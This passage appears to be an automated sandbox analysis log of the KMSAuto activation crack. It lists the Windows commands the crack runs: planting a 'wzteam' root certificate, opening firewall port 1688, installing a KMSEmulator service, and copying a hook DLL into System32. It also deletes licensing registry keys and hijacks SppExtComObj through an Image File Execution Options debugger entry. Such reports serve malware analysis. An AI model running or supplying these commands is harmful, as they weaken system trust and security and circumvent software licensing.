C:\ProgramData\KMSAuto\wzt\certmgr.execertmgr.exe -add wzteam.cer -n wzteam -s -r localMachine TRUSTEDPUBLISHER3⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c rd "C:\ProgramData\KMSAuto\wzt" /S /Q2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c bin.dat -y -pkmsauto2⤵
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\KMSAuto\bin.datbin.dat -y -pkmsauto3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin.dat"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c AESDecoder.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\KMSAuto\bin\AESDecoder.exeAESDecoder.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "AESDecoder.exe"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto2⤵
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\KMSAuto\bin_x64.datbin_x64.dat -y -pkmsauto3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c for /f "tokens=5 delims=, " %i in ('netstat -ano ^| find ":1688 "') do taskkill /pid %i /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netstat -ano | find ":1688 "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\NETSTAT.EXEnetstat -ano4⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind ":1688 "4⤵
-
C:\Windows\System32\Netsh.exeC:\Windows\Sysnative\Netsh Advfirewall Firewall delete rule name="0pen Port KMS" protocol=TCP2⤵
-
C:\Windows\System32\Netsh.exeC:\Windows\Sysnative\Netsh Advfirewall Firewall add rule name="0pen Port KMS" dir=in action=allow protocol=TCP localport=16882⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" create KMSEmulator binpath= temp.exe type= own start= auto2⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" start KMSEmulator2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto2⤵
-
C:\ProgramData\KMSAuto\bin_x64.datbin_x64.dat -y -pkmsauto3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 12⤵
-
C:\Windows\system32\ROUTE.EXEroute -p add 100.100.0.10 0.0.0.0 IF 13⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.102⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.02⤵
-
C:\Windows\system32\ROUTE.EXEroute delete 100.100.0.10 0.0.0.03⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c taskkill /t /f /IM FakeClient.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /t /f /IM FakeClient.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\sc.exe"sc.exe" stop WinDivert1.12⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" delete WinDivert1.12⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto2⤵
-
C:\ProgramData\KMSAuto\bin_x64.datbin_x64.dat -y -pkmsauto3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 12⤵
-
C:\Windows\system32\ROUTE.EXEroute -p add 100.100.0.10 0.0.0.0 IF 13⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.102⤵
-
C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exeFakeClient.exe 100.100.0.103⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.02⤵
-
C:\Windows\system32\ROUTE.EXEroute delete 100.100.0.10 0.0.0.03⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c taskkill /t /f /IM FakeClient.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /t /f /IM FakeClient.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\sc.exe"sc.exe" stop WinDivert1.12⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" delete WinDivert1.12⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto2⤵
-
C:\ProgramData\KMSAuto\bin_x64.datbin_x64.dat -y -pkmsauto3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 12⤵
-
C:\Windows\system32\ROUTE.EXEroute -p add 100.100.0.10 0.0.0.0 IF 13⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.102⤵
-
C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exeFakeClient.exe 100.100.0.103⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.02⤵
-
C:\Windows\system32\ROUTE.EXEroute delete 100.100.0.10 0.0.0.03⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c taskkill /t /f /IM FakeClient.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /t /f /IM FakeClient.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\sc.exe"sc.exe" stop WinDivert1.12⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" delete WinDivert1.12⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto2⤵
-
C:\ProgramData\KMSAuto\bin_x64.datbin_x64.dat -y -pkmsauto3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 12⤵
-
C:\Windows\system32\ROUTE.EXEroute -p add 100.100.0.10 0.0.0.0 IF 13⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.102⤵
-
C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exeFakeClient.exe 100.100.0.103⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.02⤵
-
C:\Windows\system32\ROUTE.EXEroute delete 100.100.0.10 0.0.0.03⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c taskkill /t /f /IM FakeClient.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /t /f /IM FakeClient.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\sc.exe"sc.exe" stop WinDivert1.12⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" delete WinDivert1.12⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto2⤵
-
C:\ProgramData\KMSAuto\bin_x64.datbin_x64.dat -y -pkmsauto3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 12⤵
-
C:\Windows\system32\ROUTE.EXEroute -p add 100.100.0.10 0.0.0.0 IF 13⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.102⤵
-
C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exeFakeClient.exe 100.100.0.103⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.02⤵
-
C:\Windows\system32\ROUTE.EXEroute delete 100.100.0.10 0.0.0.03⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c taskkill /t /f /IM FakeClient.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /t /f /IM FakeClient.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\sc.exe"sc.exe" stop WinDivert1.12⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" delete WinDivert1.12⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto2⤵
-
C:\ProgramData\KMSAuto\bin_x64.datbin_x64.dat -y -pkmsauto3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 12⤵
-
C:\Windows\system32\ROUTE.EXEroute -p add 100.100.0.10 0.0.0.0 IF 13⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.102⤵
-
C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exeFakeClient.exe 100.100.0.103⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.02⤵
-
C:\Windows\system32\ROUTE.EXEroute delete 100.100.0.10 0.0.0.03⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c taskkill /t /f /IM FakeClient.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /t /f /IM FakeClient.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\sc.exe"sc.exe" stop WinDivert1.12⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" delete WinDivert1.12⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto2⤵
-
C:\ProgramData\KMSAuto\bin_x64.datbin_x64.dat -y -pkmsauto3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 12⤵
-
C:\Windows\system32\ROUTE.EXEroute -p add 100.100.0.10 0.0.0.0 IF 13⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.102⤵
-
C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exeFakeClient.exe 100.100.0.103⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.02⤵
-
C:\Windows\system32\ROUTE.EXEroute delete 100.100.0.10 0.0.0.03⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c taskkill /t /f /IM FakeClient.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /t /f /IM FakeClient.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\sc.exe"sc.exe" stop WinDivert1.12⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" delete WinDivert1.12⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto2⤵
-
C:\ProgramData\KMSAuto\bin_x64.datbin_x64.dat -y -pkmsauto3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 12⤵
-
C:\Windows\system32\ROUTE.EXEroute -p add 100.100.0.10 0.0.0.0 IF 13⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.102⤵
-
C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exeFakeClient.exe 100.100.0.103⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.02⤵
-
C:\Windows\system32\ROUTE.EXEroute delete 100.100.0.10 0.0.0.03⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c taskkill /t /f /IM FakeClient.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /t /f /IM FakeClient.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\sc.exe"sc.exe" stop WinDivert1.12⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" delete WinDivert1.12⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto2⤵
-
C:\ProgramData\KMSAuto\bin_x64.datbin_x64.dat -y -pkmsauto3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 12⤵
-
C:\Windows\system32\ROUTE.EXEroute -p add 100.100.0.10 0.0.0.0 IF 13⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.102⤵
-
C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exeFakeClient.exe 100.100.0.103⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.02⤵
-
C:\Windows\system32\ROUTE.EXEroute delete 100.100.0.10 0.0.0.03⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c taskkill /t /f /IM FakeClient.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /t /f /IM FakeClient.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\sc.exe"sc.exe" stop WinDivert1.12⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" delete WinDivert1.12⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto2⤵
-
C:\ProgramData\KMSAuto\bin_x64.datbin_x64.dat -y -pkmsauto3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 12⤵
-
C:\Windows\system32\ROUTE.EXEroute -p add 100.100.0.10 0.0.0.0 IF 13⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.102⤵
-
C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exeFakeClient.exe 100.100.0.103⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.02⤵
-
C:\Windows\system32\ROUTE.EXEroute delete 100.100.0.10 0.0.0.03⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c taskkill /t /f /IM FakeClient.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /t /f /IM FakeClient.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\sc.exe"sc.exe" stop WinDivert1.12⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" delete WinDivert1.12⤵
-
C:\Windows\System32\reg.exeC:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55C92734-D682-4D71-983E-D6EC3F16059F" /f2⤵
-
C:\Windows\System32\reg.exeC:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0FF1CE15-A989-479D-AF46-F275C6370663" /f2⤵
-
C:\Windows\System32\reg.exeC:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform\59A52881-A989-479D-AF46-F275C6370663" /f2⤵
-
C:\Windows\System32\reg.exeC:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform\0FF1CE15-A989-479D-AF46-F275C6370663" /f2⤵
-
C:\Windows\System32\reg.exeC:\Windows\Sysnative\reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f" /f2⤵
-
C:\Windows\System32\reg.exeC:\Windows\Sysnative\reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\reg.exeC:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55C92734-D682-4D71-983E-D6EC3F16059F" /f2⤵
-
C:\Windows\System32\reg.exeC:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0FF1CE15-A989-479D-AF46-F275C6370663" /f2⤵
-
C:\Windows\System32\reg.exeC:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform\59A52881-A989-479D-AF46-F275C6370663" /f2⤵
-
C:\Windows\System32\reg.exeC:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform\0FF1CE15-A989-479D-AF46-F275C6370663" /f2⤵
-
C:\Windows\System32\reg.exeC:\Windows\Sysnative\reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f" /f2⤵
-
C:\Windows\System32\reg.exeC:\Windows\Sysnative\reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.02⤵
-
C:\Windows\system32\ROUTE.EXEroute delete 100.100.0.10 0.0.0.03⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c taskkill /t /f /IM FakeClient.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /t /f /IM FakeClient.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\sc.exe"sc.exe" stop WinDivert1.12⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" delete WinDivert1.12⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" stop KMSEmulator2⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" delete KMSEmulator2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c reg.exe DELETE HKLM\SYSTEM\CurrentControlSet\Services\KMSEmulator /f2⤵
-
C:\Windows\system32\reg.exereg.exe DELETE HKLM\SYSTEM\CurrentControlSet\Services\KMSEmulator /f3⤵
- Modifies registry key
-
C:\Windows\System32\Netsh.exeC:\Windows\Sysnative\Netsh Advfirewall Firewall delete rule name="0pen Port KMS" protocol=TCP2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c rd "C:\ProgramData\KMSAuto" /S /Q2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c md "C:\ProgramData\KMSAuto"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c wzt.dat -y -pkmsauto2⤵
-
C:\ProgramData\KMSAuto\wzt.datwzt.dat -y -pkmsauto3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "wzt.dat"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c certmgr.exe -add wzteam.cer -n wzteam -s -r localMachine ROOT2⤵
-
C:\ProgramData\KMSAuto\wzt\certmgr.execertmgr.exe -add wzteam.cer -n wzteam -s -r localMachine ROOT3⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c certmgr.exe -add wzteam.cer -n wzteam -s -r localMachine TRUSTEDPUBLISHER2⤵
-
C:\ProgramData\KMSAuto\wzt\certmgr.execertmgr.exe -add wzteam.cer -n wzteam -s -r localMachine TRUSTEDPUBLISHER3⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c bin.dat -y -pkmsauto2⤵
-
C:\ProgramData\KMSAuto\bin.datbin.dat -y -pkmsauto3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c rd "C:\ProgramData\KMSAuto\wzt" /S /Q2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin.dat"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c AESDecoder.exe2⤵
-
C:\ProgramData\KMSAuto\bin\AESDecoder.exeAESDecoder.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "AESDecoder.exe"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto2⤵
-
C:\ProgramData\KMSAuto\bin_x64.datbin_x64.dat -y -pkmsauto3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c for /f "tokens=5 delims=, " %i in ('netstat -ano ^| find ":1688 "') do taskkill /pid %i /f2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netstat -ano | find ":1688 "3⤵
-
C:\Windows\system32\NETSTAT.EXEnetstat -ano4⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind ":1688 "4⤵
-
C:\Windows\System32\Netsh.exeC:\Windows\Sysnative\Netsh Advfirewall Firewall delete rule name="0pen Port KMS" protocol=TCP2⤵
-
C:\Windows\System32\Netsh.exeC:\Windows\Sysnative\Netsh Advfirewall Firewall add rule name="0pen Port KMS" dir=in action=allow protocol=TCP localport=16882⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" create KMSEmulator binpath= temp.exe type= own start= auto2⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" start KMSEmulator2⤵
-
C:\Windows\SysWOW64\net.exenet stop sppsvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sppsvc /y3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c taskkill /t /f /IM SppExtComObj.Exe2⤵
-
C:\Windows\System32\taskkill.exetaskkill /t /f /IM SppExtComObj.Exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c SppPatcher_x64.dat -y -pkmsauto2⤵
-
C:\Users\Admin\AppData\Local\Temp\SppPatcher_x64.datSppPatcher_x64.dat -y -pkmsauto3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "SppPatcher_x64.dat"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c copy SppExtComObjPatcher.exe C:\Windows\System32\SppExtComObjPatcher.exe /Y2⤵
- Drops file in System32 directory
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c copy SppExtComObjHook.dll C:\Windows\System32\SppExtComObjHook.dll /Y2⤵
- Drops file in System32 directory
-
C:\Windows\System32\reg.exeC:\Windows\Sysnative\reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.Exe" /f /v "Debugger" /t REG_SZ /d "SppExtComObjPatcher.exe"2⤵
-
C:\Windows\System32\reg.exeC:\Windows\Sysnative\reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.Exe" /f /v "KMS_Emulation" /t REG_DWORD /d 02⤵
-
C:\Windows\System32\reg.exeC:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55C92734-D682-4D71-983E-D6EC3F16059F" /f2⤵
-
C:\Windows\System32\reg.exeC:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0FF1CE15-A989-479D-AF46-F275C6370663" /f2⤵
-
C:\Windows\System32\reg.exeC:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform\59A52881-A989-479D-AF46-F275C6370663" /f2⤵
-
C:\Windows\System32\reg.exeC:\Windows\Sysnative\reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform\0FF1CE15-A989-479D-AF46-F275C6370663" /f2⤵
-
C:\Windows\System32\reg.exeC:\Windows\Sysnative\reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f" /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\reg.exeC:\Windows\Sysnative\reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f2⤵
-
